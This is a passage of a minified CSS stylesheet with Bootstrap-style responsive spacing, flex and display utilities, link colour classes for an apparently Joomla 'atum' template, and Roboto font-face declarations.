-auto{margin-right:auto!important;margin-left:auto!important}.my-md-0{margin-top:0!important;margin-bottom:0!important}.my-md-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-md-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-md-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-md-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-md-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-md-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-md-0{margin-top:0!important}.mt-md-1{margin-top:.25rem!important}.mt-md-2{margin-top:.5rem!important}.mt-md-3{margin-top:1rem!important}.mt-md-4{margin-top:1.5rem!important}.mt-md-5{margin-top:3rem!important}.mt-md-auto{margin-top:auto!important}.me-md-0{margin-right:0!important}.me-md-1{margin-right:.25rem!important}.me-md-2{margin-right:.5rem!important}.me-md-3{margin-right:1rem!important}.me-md-4{margin-right:1.5rem!important}.me-md-5{margin-right:3rem!important}.me-md-auto{margin-right:auto!important}.mb-md-0{margin-bottom:0!important}.mb-md-1{margin-bottom:.25rem!important}.mb-md-2{margin-bottom:.5rem!important}.mb-md-3{margin-bottom:1rem!important}.mb-md-4{margin-bottom:1.5rem!important}.mb-md-5{margin-bottom:3rem!important}.mb-md-auto{margin-bottom:auto!important}.ms-md-0{margin-left:0!important}.ms-md-1{margin-left:.25rem!important}.ms-md-2{margin-left:.5rem!important}.ms-md-3{margin-left:1rem!important}.ms-md-4{margin-left:1.5rem!important}.ms-md-5{margin-left:3rem!important}.ms-md-auto{margin-left:auto!important}.p-md-0{padding:0!important}.p-md-1{padding:.25rem!important}.p-md-2{padding:.5rem!important}.p-md-3{padding:1rem!important}.p-md-4{padding:1.5rem!important}.p-md-5{padding:3rem!important}.px-md-0{padding-right:0!important;padding-left:0!important}.px-md-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-md-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-md-3{padding-right:1rem!important;padding-left:1rem!important}.px-md-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-md-5{padding-right:3rem!important;padding-left:3rem!important}.py-md-0{padding-top:0!important;padding-bottom:0!important}.py-md-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-md-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-md-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-md-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-md-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-md-0{padding-top:0!important}.pt-md-1{padding-top:.25rem!important}.pt-md-2{padding-top:.5rem!important}.pt-md-3{padding-top:1rem!important}.pt-md-4{padding-top:1.5rem!important}.pt-md-5{padding-top:3rem!important}.pe-md-0{padding-right:0!important}.pe-md-1{padding-right:.25rem!important}.pe-md-2{padding-right:.5rem!important}.pe-md-3{padding-right:1rem!important}.pe-md-4{padding-right:1.5rem!important}.pe-md-5{padding-right:3rem!important}.pb-md-0{padding-bottom:0!important}.pb-md-1{padding-bottom:.25rem!important}.pb-md-2{padding-bottom:.5rem!important}.pb-md-3{padding-bottom:1rem!important}.pb-md-4{padding-bottom:1.5rem!important}.pb-md-5{padding-bottom:3rem!important}.ps-md-0{padding-left:0!important}.ps-md-1{padding-left:.25rem!important}.ps-md-2{padding-left:.5rem!important}.ps-md-3{padding-left:1rem!important}.ps-md-4{padding-left:1.5rem!important}.ps-md-5{padding-left:3rem!important}.text-md-start{text-align:left!important}.text-md-end{text-align:right!important}.text-md-center{text-align:center!important}}@media (min-width:992px){.float-lg-start{float:left!important}.float-lg-end{float:right!important}.float-lg-none{float:none!important}.d-lg-inline{display:inline!important}.d-lg-inline-block{display:inline-block!important}.d-lg-block{display:block!important}.d-lg-grid{display:grid!important}.d-lg-table{display:table!important}.d-lg-table-row{display:table-row!important}.d-lg-table-cell{display:table-cell!important}.d-lg-flex{display:flex!important}.d-lg-inline-flex{display:inline-flex!important}.d-lg-none{display:none!important}.flex-lg-fill{flex:1 1 auto!important}.flex-lg-row{flex-direction:row!important}.flex-lg-column{flex-direction:column!important}.flex-lg-row-reverse{flex-direction:row-reverse!important}.flex-lg-column-reverse{flex-direction:column-reverse!important}.flex-lg-grow-0{flex-grow:0!important}.flex-lg-grow-1{flex-grow:1!important}.flex-lg-shrink-0{flex-shrink:0!important}.flex-lg-shrink-1{flex-shrink:1!important}.flex-lg-wrap{flex-wrap:wrap!important}.flex-lg-nowrap{flex-wrap:nowrap!important}.flex-lg-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-lg-0{gap:0!important}.gap-lg-1{gap:.25rem!important}.gap-lg-2{gap:.5rem!important}.gap-lg-3{gap:1rem!important}.gap-lg-4{gap:1.5rem!important}.gap-lg-5{gap:3rem!important}.justify-content-lg-start{justify-content:flex-start!important}.justify-content-lg-end{justify-content:flex-end!important}.justify-content-lg-center{justify-content:center!important}.justify-content-lg-between{justify-content:space-between!important}.justify-content-lg-around{justify-content:space-around!important}.justify-content-lg-evenly{justify-content:space-evenly!important}.align-items-lg-start{align-items:flex-start!important}.align-items-lg-end{align-items:flex-end!important}.align-items-lg-center{align-items:center!important}.align-items-lg-baseline{align-items:baseline!important}.align-items-lg-stretch{align-items:stretch!important}.align-content-lg-start{align-content:flex-start!important}.align-content-lg-end{align-content:flex-end!important}.align-content-lg-center{align-content:center!important}.align-content-lg-between{align-content:space-between!important}.align-content-lg-around{align-content:space-around!important}.align-content-lg-stretch{align-content:stretch!important}.align-self-lg-auto{align-self:auto!important}.align-self-lg-start{align-self:flex-start!important}.align-self-lg-end{align-self:flex-end!important}.align-self-lg-center{align-self:center!important}.align-self-lg-baseline{align-self:baseline!important}.align-self-lg-stretch{align-self:stretch!important}.order-lg-first{order:-1!important}.order-lg-0{order:0!important}.order-lg-1{order:1!important}.order-lg-2{order:2!important}.order-lg-3{order:3!important}.order-lg-4{order:4!important}.order-lg-5{order:5!important}.order-lg-last{order:6!important}.m-lg-0{margin:0!important}.m-lg-1{margin:.25rem!important}.m-lg-2{margin:.5rem!important}.m-lg-3{margin:1rem!important}.m-lg-4{margin:1.5rem!important}.m-lg-5{margin:3rem!important}.m-lg-auto{margin:auto!important}.mx-lg-0{margin-right:0!important;margin-left:0!important}.mx-lg-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-lg-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-lg-3{margin-right:1rem!important;margin-left:1rem!important}.mx-lg-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-lg-5{margin-right:3rem!important;margin-left:3rem!important}.mx-lg-auto{margin-right:auto!important;margin-left:auto!important}.my-lg-0{margin-top:0!important;margin-bottom:0!important}.my-lg-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-lg-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-lg-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-lg-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-lg-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-lg-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-lg-0{margin-top:0!important}.mt-lg-1{margin-top:.25rem!important}.mt-lg-2{margin-top:.5rem!important}.mt-lg-3{margin-top:1rem!important}.mt-lg-4{margin-top:1.5rem!important}.mt-lg-5{margin-top:3rem!important}.mt-lg-auto{margin-top:auto!important}.me-lg-0{margin-right:0!important}.me-lg-1{margin-right:.25rem!important}.me-lg-2{margin-right:.5rem!important}.me-lg-3{margin-right:1rem!important}.me-lg-4{margin-right:1.5rem!important}.me-lg-5{margin-right:3rem!important}.me-lg-auto{margin-right:auto!important}.mb-lg-0{margin-bottom:0!important}.mb-lg-1{margin-bottom:.25rem!important}.mb-lg-2{margin-bottom:.5rem!important}.mb-lg-3{margin-bottom:1rem!important}.mb-lg-4{margin-bottom:1.5rem!important}.mb-lg-5{margin-bottom:3rem!important}.mb-lg-auto{margin-bottom:auto!important}.ms-lg-0{margin-left:0!important}.ms-lg-1{margin-left:.25rem!important}.ms-lg-2{margin-left:.5rem!important}.ms-lg-3{margin-left:1rem!important}.ms-lg-4{margin-left:1.5rem!important}.ms-lg-5{margin-left:3rem!important}.ms-lg-auto{margin-left:auto!important}.p-lg-0{padding:0!important}.p-lg-1{padding:.25rem!important}.p-lg-2{padding:.5rem!important}.p-lg-3{padding:1rem!important}.p-lg-4{padding:1.5rem!important}.p-lg-5{padding:3rem!important}.px-lg-0{padding-right:0!important;padding-left:0!important}.px-lg-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-lg-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-lg-3{padding-right:1rem!important;padding-left:1rem!important}.px-lg-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-lg-5{padding-right:3rem!important;padding-left:3rem!important}.py-lg-0{padding-top:0!important;padding-bottom:0!important}.py-lg-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-lg-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-lg-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-lg-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-lg-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-lg-0{padding-top:0!important}.pt-lg-1{padding-top:.25rem!important}.pt-lg-2{padding-top:.5rem!important}.pt-lg-3{padding-top:1rem!important}.pt-lg-4{padding-top:1.5rem!important}.pt-lg-5{padding-top:3rem!important}.pe-lg-0{padding-right:0!important}.pe-lg-1{padding-right:.25rem!important}.pe-lg-2{padding-right:.5rem!important}.pe-lg-3{padding-right:1rem!important}.pe-lg-4{padding-right:1.5rem!important}.pe-lg-5{padding-right:3rem!important}.pb-lg-0{padding-bottom:0!important}.pb-lg-1{padding-bottom:.25rem!important}.pb-lg-2{padding-bottom:.5rem!important}.pb-lg-3{padding-bottom:1rem!important}.pb-lg-4{padding-bottom:1.5rem!important}.pb-lg-5{padding-bottom:3rem!important}.ps-lg-0{padding-left:0!important}.ps-lg-1{padding-left:.25rem!important}.ps-lg-2{padding-left:.5rem!important}.ps-lg-3{padding-left:1rem!important}.ps-lg-4{padding-left:1.5rem!important}.ps-lg-5{padding-left:3rem!important}.text-lg-start{text-align:left!important}.text-lg-end{text-align:right!important}.text-lg-center{text-align:center!important}}@media (min-width:1200px){.float-xl-start{float:left!important}.float-xl-end{float:right!important}.float-xl-none{float:none!important}.d-xl-inline{display:inline!important}.d-xl-inline-block{display:inline-block!important}.d-xl-block{display:block!important}.d-xl-grid{display:grid!important}.d-xl-table{display:table!important}.d-xl-table-row{display:table-row!important}.d-xl-table-cell{display:table-cell!important}.d-xl-flex{display:flex!important}.d-xl-inline-flex{display:inline-flex!important}.d-xl-none{display:none!important}.flex-xl-fill{flex:1 1 auto!important}.flex-xl-row{flex-direction:row!important}.flex-xl-column{flex-direction:column!important}.flex-xl-row-reverse{flex-direction:row-reverse!important}.flex-xl-column-reverse{flex-direction:column-reverse!important}.flex-xl-grow-0{flex-grow:0!important}.flex-xl-grow-1{flex-grow:1!important}.flex-xl-shrink-0{flex-shrink:0!important}.flex-xl-shrink-1{flex-shrink:1!important}.flex-xl-wrap{flex-wrap:wrap!important}.flex-xl-nowrap{flex-wrap:nowrap!important}.flex-xl-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-xl-0{gap:0!important}.gap-xl-1{gap:.25rem!important}.gap-xl-2{gap:.5rem!important}.gap-xl-3{gap:1rem!important}.gap-xl-4{gap:1.5rem!important}.gap-xl-5{gap:3rem!important}.justify-content-xl-start{justify-content:flex-start!important}.justify-content-xl-end{justify-content:flex-end!important}.justify-content-xl-center{justify-content:center!important}.justify-content-xl-between{justify-content:space-between!important}.justify-content-xl-around{justify-content:space-around!important}.justify-content-xl-evenly{justify-content:space-evenly!important}.align-items-xl-start{align-items:flex-start!important}.align-items-xl-end{align-items:flex-end!important}.align-items-xl-center{align-items:center!important}.align-items-xl-baseline{align-items:baseline!important}.align-items-xl-stretch{align-items:stretch!important}.align-content-xl-start{align-content:flex-start!important}.align-content-xl-end{align-content:flex-end!important}.align-content-xl-center{align-content:center!important}.align-content-xl-between{align-content:space-between!important}.align-content-xl-around{align-content:space-around!important}.align-content-xl-stretch{align-content:stretch!important}.align-self-xl-auto{align-self:auto!important}.align-self-xl-start{align-self:flex-start!important}.align-self-xl-end{align-self:flex-end!important}.align-self-xl-center{align-self:center!important}.align-self-xl-baseline{align-self:baseline!important}.align-self-xl-stretch{align-self:stretch!important}.order-xl-first{order:-1!important}.order-xl-0{order:0!important}.order-xl-1{order:1!important}.order-xl-2{order:2!important}.order-xl-3{order:3!important}.order-xl-4{order:4!important}.order-xl-5{order:5!important}.order-xl-last{order:6!important}.m-xl-0{margin:0!important}.m-xl-1{margin:.25rem!important}.m-xl-2{margin:.5rem!important}.m-xl-3{margin:1rem!important}.m-xl-4{margin:1.5rem!important}.m-xl-5{margin:3rem!important}.m-xl-auto{margin:auto!important}.mx-xl-0{margin-right:0!important;margin-left:0!important}.mx-xl-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-xl-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-xl-3{margin-right:1rem!important;margin-left:1rem!important}.mx-xl-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-xl-5{margin-right:3rem!important;margin-left:3rem!important}.mx-xl-auto{margin-right:auto!important;margin-left:auto!important}.my-xl-0{margin-top:0!important;margin-bottom:0!important}.my-xl-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-xl-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-xl-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-xl-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-xl-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-xl-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-xl-0{margin-top:0!important}.mt-xl-1{margin-top:.25rem!important}.mt-xl-2{margin-top:.5rem!important}.mt-xl-3{margin-top:1rem!important}.mt-xl-4{margin-top:1.5rem!important}.mt-xl-5{margin-top:3rem!important}.mt-xl-auto{margin-top:auto!important}.me-xl-0{margin-right:0!important}.me-xl-1{margin-right:.25rem!important}.me-xl-2{margin-right:.5rem!important}.me-xl-3{margin-right:1rem!important}.me-xl-4{margin-right:1.5rem!important}.me-xl-5{margin-right:3rem!important}.me-xl-auto{margin-right:auto!important}.mb-xl-0{margin-bottom:0!important}.mb-xl-1{margin-bottom:.25rem!important}.mb-xl-2{margin-bottom:.5rem!important}.mb-xl-3{margin-bottom:1rem!important}.mb-xl-4{margin-bottom:1.5rem!important}.mb-xl-5{margin-bottom:3rem!important}.mb-xl-auto{margin-bottom:auto!important}.ms-xl-0{margin-left:0!important}.ms-xl-1{margin-left:.25rem!important}.ms-xl-2{margin-left:.5rem!important}.ms-xl-3{margin-left:1rem!important}.ms-xl-4{margin-left:1.5rem!important}.ms-xl-5{margin-left:3rem!important}.ms-xl-auto{margin-left:auto!important}.p-xl-0{padding:0!important}.p-xl-1{padding:.25rem!important}.p-xl-2{padding:.5rem!important}.p-xl-3{padding:1rem!important}.p-xl-4{padding:1.5rem!important}.p-xl-5{padding:3rem!important}.px-xl-0{padding-right:0!important;padding-left:0!important}.px-xl-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-xl-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-xl-3{padding-right:1rem!important;padding-left:1rem!important}.px-xl-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-xl-5{padding-right:3rem!important;padding-left:3rem!important}.py-xl-0{padding-top:0!important;padding-bottom:0!important}.py-xl-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-xl-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-xl-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-xl-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-xl-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-xl-0{padding-top:0!important}.pt-xl-1{padding-top:.25rem!important}.pt-xl-2{padding-top:.5rem!important}.pt-xl-3{padding-top:1rem!important}.pt-xl-4{padding-top:1.5rem!important}.pt-xl-5{padding-top:3rem!important}.pe-xl-0{padding-right:0!important}.pe-xl-1{padding-right:.25rem!important}.pe-xl-2{padding-right:.5rem!important}.pe-xl-3{padding-right:1rem!important}.pe-xl-4{padding-right:1.5rem!important}.pe-xl-5{padding-right:3rem!important}.pb-xl-0{padding-bottom:0!important}.pb-xl-1{padding-bottom:.25rem!important}.pb-xl-2{padding-bottom:.5rem!important}.pb-xl-3{padding-bottom:1rem!important}.pb-xl-4{padding-bottom:1.5rem!important}.pb-xl-5{padding-bottom:3rem!important}.ps-xl-0{padding-left:0!important}.ps-xl-1{padding-left:.25rem!important}.ps-xl-2{padding-left:.5rem!important}.ps-xl-3{padding-left:1rem!important}.ps-xl-4{padding-left:1.5rem!important}.ps-xl-5{padding-left:3rem!important}.text-xl-start{text-align:left!important}.text-xl-end{text-align:right!important}.text-xl-center{text-align:center!important}}@media (min-width:1400px){.float-xxl-start{float:left!important}.float-xxl-end{float:right!important}.float-xxl-none{float:none!important}.d-xxl-inline{display:inline!important}.d-xxl-inline-block{display:inline-block!important}.d-xxl-block{display:block!important}.d-xxl-grid{display:grid!important}.d-xxl-table{display:table!important}.d-xxl-table-row{display:table-row!important}.d-xxl-table-cell{display:table-cell!important}.d-xxl-flex{display:flex!important}.d-xxl-inline-flex{display:inline-flex!important}.d-xxl-none{display:none!important}.flex-xxl-fill{flex:1 1 auto!important}.flex-xxl-row{flex-direction:row!important}.flex-xxl-column{flex-direction:column!important}.flex-xxl-row-reverse{flex-direction:row-reverse!important}.flex-xxl-column-reverse{flex-direction:column-reverse!important}.flex-xxl-grow-0{flex-grow:0!important}.flex-xxl-grow-1{flex-grow:1!important}.flex-xxl-shrink-0{flex-shrink:0!important}.flex-xxl-shrink-1{flex-shrink:1!important}.flex-xxl-wrap{flex-wrap:wrap!important}.flex-xxl-nowrap{flex-wrap:nowrap!important}.flex-xxl-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-xxl-0{gap:0!important}.gap-xxl-1{gap:.25rem!important}.gap-xxl-2{gap:.5rem!important}.gap-xxl-3{gap:1rem!important}.gap-xxl-4{gap:1.5rem!important}.gap-xxl-5{gap:3rem!important}.justify-content-xxl-start{justify-content:flex-start!important}.justify-content-xxl-end{justify-content:flex-end!important}.justify-content-xxl-center{justify-content:center!important}.justify-content-xxl-between{justify-content:space-between!important}.justify-content-xxl-around{justify-content:space-around!important}.justify-content-xxl-evenly{justify-content:space-evenly!important}.align-items-xxl-start{align-items:flex-start!important}.align-items-xxl-end{align-items:flex-end!important}.align-items-xxl-center{align-items:center!important}.align-items-xxl-baseline{align-items:baseline!important}.align-items-xxl-stretch{align-items:stretch!important}.align-content-xxl-start{align-content:flex-start!important}.align-content-xxl-end{align-content:flex-end!important}.align-content-xxl-center{align-content:center!important}.align-content-xxl-between{align-content:space-between!important}.align-content-xxl-around{align-content:space-around!important}.align-content-xxl-stretch{align-content:stretch!important}.align-self-xxl-auto{align-self:auto!important}.align-self-xxl-start{align-self:flex-start!important}.align-self-xxl-end{align-self:flex-end!important}.align-self-xxl-center{align-self:center!important}.align-self-xxl-baseline{align-self:baseline!important}.align-self-xxl-stretch{align-self:stretch!important}.order-xxl-first{order:-1!important}.order-xxl-0{order:0!important}.order-xxl-1{order:1!important}.order-xxl-2{order:2!important}.order-xxl-3{order:3!important}.order-xxl-4{order:4!important}.order-xxl-5{order:5!important}.order-xxl-last{order:6!important}.m-xxl-0{margin:0!important}.m-xxl-1{margin:.25rem!important}.m-xxl-2{margin:.5rem!important}.m-xxl-3{margin:1rem!important}.m-xxl-4{margin:1.5rem!important}.m-xxl-5{margin:3rem!important}.m-xxl-auto{margin:auto!important}.mx-xxl-0{margin-right:0!important;margin-left:0!important}.mx-xxl-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-xxl-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-xxl-3{margin-right:1rem!important;margin-left:1rem!important}.mx-xxl-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-xxl-5{margin-right:3rem!important;margin-left:3rem!important}.mx-xxl-auto{margin-right:auto!important;margin-left:auto!important}.my-xxl-0{margin-top:0!important;margin-bottom:0!important}.my-xxl-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-xxl-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-xxl-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-xxl-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-xxl-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-xxl-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-xxl-0{margin-top:0!important}.mt-xxl-1{margin-top:.25rem!important}.mt-xxl-2{margin-top:.5rem!important}.mt-xxl-3{margin-top:1rem!important}.mt-xxl-4{margin-top:1.5rem!important}.mt-xxl-5{margin-top:3rem!important}.mt-xxl-auto{margin-top:auto!important}.me-xxl-0{margin-right:0!important}.me-xxl-1{margin-right:.25rem!important}.me-xxl-2{margin-right:.5rem!important}.me-xxl-3{margin-right:1rem!important}.me-xxl-4{margin-right:1.5rem!important}.me-xxl-5{margin-right:3rem!important}.me-xxl-auto{margin-right:auto!important}.mb-xxl-0{margin-bottom:0!important}.mb-xxl-1{margin-bottom:.25rem!important}.mb-xxl-2{margin-bottom:.5rem!important}.mb-xxl-3{margin-bottom:1rem!important}.mb-xxl-4{margin-bottom:1.5rem!important}.mb-xxl-5{margin-bottom:3rem!important}.mb-xxl-auto{margin-bottom:auto!important}.ms-xxl-0{margin-left:0!important}.ms-xxl-1{margin-left:.25rem!important}.ms-xxl-2{margin-left:.5rem!important}.ms-xxl-3{margin-left:1rem!important}.ms-xxl-4{margin-left:1.5rem!important}.ms-xxl-5{margin-left:3rem!important}.ms-xxl-auto{margin-left:auto!important}.p-xxl-0{padding:0!important}.p-xxl-1{padding:.25rem!important}.p-xxl-2{padding:.5rem!important}.p-xxl-3{padding:1rem!important}.p-xxl-4{padding:1.5rem!important}.p-xxl-5{padding:3rem!important}.px-xxl-0{padding-right:0!important;padding-left:0!important}.px-xxl-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-xxl-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-xxl-3{padding-right:1rem!important;padding-left:1rem!important}.px-xxl-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-xxl-5{padding-right:3rem!important;padding-left:3rem!important}.py-xxl-0{padding-top:0!important;padding-bottom:0!important}.py-xxl-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-xxl-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-xxl-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-xxl-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-xxl-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-xxl-0{padding-top:0!important}.pt-xxl-1{padding-top:.25rem!important}.pt-xxl-2{padding-top:.5rem!important}.pt-xxl-3{padding-top:1rem!important}.pt-xxl-4{padding-top:1.5rem!important}.pt-xxl-5{padding-top:3rem!important}.pe-xxl-0{padding-right:0!important}.pe-xxl-1{padding-right:.25rem!important}.pe-xxl-2{padding-right:.5rem!important}.pe-xxl-3{padding-right:1rem!important}.pe-xxl-4{padding-right:1.5rem!important}.pe-xxl-5{padding-right:3rem!important}.pb-xxl-0{padding-bottom:0!important}.pb-xxl-1{padding-bottom:.25rem!important}.pb-xxl-2{padding-bottom:.5rem!important}.pb-xxl-3{padding-bottom:1rem!important}.pb-xxl-4{padding-bottom:1.5rem!important}.pb-xxl-5{padding-bottom:3rem!important}.ps-xxl-0{padding-left:0!important}.ps-xxl-1{padding-left:.25rem!important}.ps-xxl-2{padding-left:.5rem!important}.ps-xxl-3{padding-left:1rem!important}.ps-xxl-4{padding-left:1.5rem!important}.ps-xxl-5{padding-left:3rem!important}.text-xxl-start{text-align:left!important}.text-xxl-end{text-align:right!important}.text-xxl-center{text-align:center!important}}@media (min-width:1200px){.fs-1{font-size:1.65rem!important}.fs-2{font-size:1.5rem!important}}@media print{.d-print-inline{display:inline!important}.d-print-inline-block{display:inline-block!important}.d-print-block{display:block!important}.d-print-grid{display:grid!important}.d-print-table{display:table!important}.d-print-table-row{display:table-row!important}.d-print-table-cell{display:table-cell!important}.d-print-flex{display:flex!important}.d-print-inline-flex{display:inline-flex!important}.d-print-none{display:none!important}}.clearfix:after{display:block;clear:both;content:""}.link-primary{color:#132f53}.link-primary:focus,.link-primary:hover{color:#0f2642}.link-secondary{color:#495057}.link-secondary:focus,.link-secondary:hover{color:#3a4046}.link-success{color:#457d54}.link-success:focus,.link-success:hover{color:#376443}.link-info{color:#2a69b8}.link-info:focus,.link-info:hover{color:#225493}.link-warning{color:#ffb514}.link-warning:focus,.link-warning:hover{color:#ffc443}.link-danger{color:#c52827}.link-danger:focus,.link-danger:hover{color:#9e201f}.link-light{color:#f8f9fa}.link-light:focus,.link-light:hover{color:#f9fafb}.link-dark{color:#212529}.link-dark:focus,.link-dark:hover{color:#1a1e21}.link-atum-link-color{color:#2a69b8}.link-atum-link-color:focus,.link-atum-link-color:hover{color:#225493}.link-atum-text-dark{color:#495057}.link-atum-text-dark:focus,.link-atum-text-dark:hover{color:#3a4046}.link-action{color:#132f53}.link-action:focus,.link-action:hover{color:#0f2642}.link-error{color:#3b0d0c}.link-error:focus,.link-error:hover{color:#2f0a0a}.link-alert-success{color:#0f2f21}.link-alert-success:focus,.link-alert-success:hover{color:#0c261a}.ratio{position:relative;width:100%}.ratio:before{display:block;padding-top:var(--aspect-ratio);content:""}.ratio>*{position:absolute;top:0;left:0;width:100%;height:100%}.ratio-1x1{--aspect-ratio:100%}.ratio-4x3{--aspect-ratio:75%}.ratio-16x9{--aspect-ratio:56.25%}.ratio-21x9{--aspect-ratio:42.85714%}.fixed-top{top:0}.fixed-bottom,.fixed-top{position:fixed;right:0;left:0;z-index:1030}.fixed-bottom{bottom:0}.sticky-top{position:sticky;top:0;z-index:1020}@media (min-width:576px){.sticky-sm-top{position:sticky;top:0;z-index:1020}}@media (min-width:768px){.sticky-md-top{position:sticky;top:0;z-index:1020}}@media (min-width:992px){.sticky-lg-top{position:sticky;top:0;z-index:1020}}@media (min-width:1200px){.sticky-xl-top{position:sticky;top:0;z-index:1020}}@media (min-width:1400px){.sticky-xxl-top{position:sticky;top:0;z-index:1020}}.sr-only,.visually-hidden,.visually-hidden-focusable:not(:focus):not(:focus-within){position:absolute!important;width:1px!important;height:1px!important;padding:0!important;margin:-1px!important;overflow:hidden!important;clip:rect(0,0,0,0)!important;white-space:nowrap!important;border:0!important}.stretched-link:after{position:absolute;top:0;right:0;bottom:0;left:0;z-index:1;content:""}.text-truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff) format("woff");font-weight:400;font-style:normal}@font-face{font-family:Roboto-Regular;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff) format("woff");font-weight:400;font-style:italic}@font-face{font-family:Roboto-RegularItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff) format("woff");font-weight:300;font-style:normal}@font-face{font-family:Roboto-Light;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff) format("woff");font-weight:300;font-style:italic}@font-face{font-family:Roboto-LightItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff) format("woff");font-weight:100;font-style:normal}@font-face{font-family:Roboto-Thin;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff) format("woff");font-weight:100;font-style:italic}@font-face{font-family:Roboto-ThinItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff) 